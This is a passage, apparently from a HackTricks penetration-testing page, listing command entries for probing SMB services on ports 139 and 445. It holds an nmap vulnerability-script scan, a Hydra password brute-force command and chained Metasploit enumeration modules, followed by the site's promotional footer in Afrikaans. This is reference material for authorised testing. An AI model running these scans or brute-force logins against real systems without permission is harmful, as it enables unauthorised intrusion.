|
||
|
||
Entry_4:
|
||
Name: Nmap Smb Scan 2
|
||
Description: SMB Vuln Scan With Nmap (Less Specific)
|
||
Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}
|
||
|
||
Entry_5:
|
||
Name: Hydra Brute Force
|
||
Description: Need User
|
||
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
|
||
|
||
Entry_6:
|
||
Name: SMB/SMB2 139/445 consolesless mfs enumeration
|
||
Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole
|
||
Note: sourced from https://github.com/carlospolop/legion
|
||
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
|
||
|
||
```
|
||
<details>
|
||
|
||
<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||
|
||
Ander maniere om HackTricks te ondersteun:
|
||
|
||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
|
||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
* Ontdek [**Die PEASS-familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
|
||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||
|
||
</details>
|